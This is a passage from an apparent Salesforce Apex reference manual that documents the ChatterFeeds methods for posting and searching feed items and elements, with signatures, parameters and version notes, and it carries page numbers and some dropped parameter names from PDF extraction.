ConnectApi.BatchInput(Object input)No binary input
ConnectApi.BatchInput(Object input, ConnectApi.BinaryInput binary)One binary input.
SEE ALSO:
Post a Batch of Feed Elements
Post a Batch of Feed Elements with New (Binary) Files
API Version
28.031.0
Important: In version 32.0 and later, use postFeedElement(String, String, ConnectApi.FeedElementType, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItem postFeedItem(String communityId, ConnectApi.FeedType
feedType, String subjectId, String text)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
671
Reference
ChatterFeeds Class
subjectId
Type: String
The value depends on the feedType:
NewssubjectId must be the ID of the context user or the keyword me.
RecordThe ID of any record with a feed, including groups.
UserProfileThe ID of any user.
text
Type: String
The text of the feed item. Mentions are downgraded to plain text. To include a mention that links to the user, call the
postFeedItem(String, ConnectApi.FeedType, String, ConnectApi.FeedItemInput, ConnectApi.BinaryInput) method and pass the
mention in a ConnectApi.FeedItemInput object.
Return Value
Type: ConnectApi.FeedItem
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
Usage
Feed items and comments can contain up to 5000 characters.
Posts to ConnectApi.FeedType.UserProfile in API versions 23.0 and 24.0 created user status updates, not feed items. For
posts to the User Profile Feed in those API versions, the character limit is 1000 characters.
API Version
28.031.0
Important: In version 32.0 and later, use postFeedElement(String, ConnectApi.FeedElementInput, ConnectApi.BinaryInput).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItem postFeedItem(String communityId, ConnectApi.FeedType
feedType, String subjectId, ConnectApi.FeedItemInput feedItemInput,
ConnectApi.BinaryInput feedItemFileUpload)
672
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
feedItemInput
Type: ConnectApi.FeedItemInput
In the FeedItemInput object, specify rich text. Optionally, in the FeedItemInput.attachment property, specify a link,
a poll, an existing file, or a new file.
feedItemFileUpload
Type: ConnectApi.BinaryInput
If you specify a NewFileAttachmentInput object in the FeedItemInput.attachment property, specify the new
binary file to attach in this argument. Otherwise, do not specify a value.
Return Value
Type: ConnectApi.FeedItem
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
Usage
Feed items and comments can contain up to 5000 characters.Posts to ConnectApi.FeedType.UserProfile in API versions
23.0 and 24.0 created user status updates, not feed items. For posts to the User Profile Feed in those API versions, the character limit is
1000 characters.
673
Reference
ChatterFeeds Class
searchFeedElements(String, String)
Returns the first page of all the feed elements that match the specified search criteria.
674
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElements(String communityId, String
q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElements(String, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
675
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElements(String communityId, String
q, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
If you pass in null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElements(String, String, ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
676
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElements(String communityId, String
q, String pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElements(String, String, String, Integer, ConnectApi.FeedElementPage)
Testing ConnectApi Code
677
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElements(String communityId, String
q, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
If you pass in null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
678
Reference
ChatterFeeds Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElements(String, String, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElements(String communityId, String
q, Integer recentCommentCount, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
pageParam
Type: String
679
Reference
ChatterFeeds Class
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
If you pass in null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElements(String, String, Integer, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String q)
680
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
681
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
682
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
683
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
ConnectApi.FeedFilter filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
684
Reference
ChatterFeeds Class
feedType
Type: ConnectApi.FeedType
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
685
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
686
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
687
Reference
ChatterFeeds Class
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Specifies the order returned by the sort, such as by date created or last modified:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Search term. Searches keywords in the user or group name. A minimum of 1 character is required. This parameter does not support
wildcards. This parameter is required.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
688
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
689
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
690
Reference
ChatterFeeds Class
subjectId
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
691
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, Boolean showInternalOnly,
ConnectApi.FeedFilter filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
692
Reference
ChatterFeeds Class
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
693
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestSearchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean, ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFilterFeed(String
communityId, String subjectId, String keyPrefix, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
694
Reference
ChatterFeeds Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElementsInFilterFeed(String, String, String, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFilterFeed(String
communityId, String subjectId, String keyPrefix, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
695
Reference
ChatterFeeds Class
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElementsInFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage searchFeedElementsInFilterFeed(String
communityId, String subjectId, String keyPrefix, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
696
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
697
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedElementsInFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedElementPage)
searchFeedItems(String, String)
Returns the first page of all the feed items that match the specified search criteria. The page contains the default number of items.
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElements(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItems(String communityId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
698
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedItemPage
SEE ALSO:
setTestSearchFeedItems(String, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElements(String, String, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItems(String communityId, String q,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
699
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedItemPage
SEE ALSO:
setTestSearchFeedItems(String, String, ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElements(String, String, String, Integer).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItems(String communityId, String q,
String pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
700
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedItemPage
SEE ALSO:
setTestSearchFeedItems(String, String, String, Integer, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElements(String, String, String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItems(String communityId, String q,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
701
Reference
ChatterFeeds Class
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
SEE ALSO:
setTestSearchFeedItems(String, String, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use searchFeedElements(String, String, Integer, String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItems(String communityId, String q,
Integer recentCommentCount, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
702
Reference
ChatterFeeds Class
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
SEE ALSO:
setTestSearchFeedItems(String, String, Integer, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String).
Requires Chatter
Yes
703
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedSortOrder, String).
704
Reference
ChatterFeeds Class
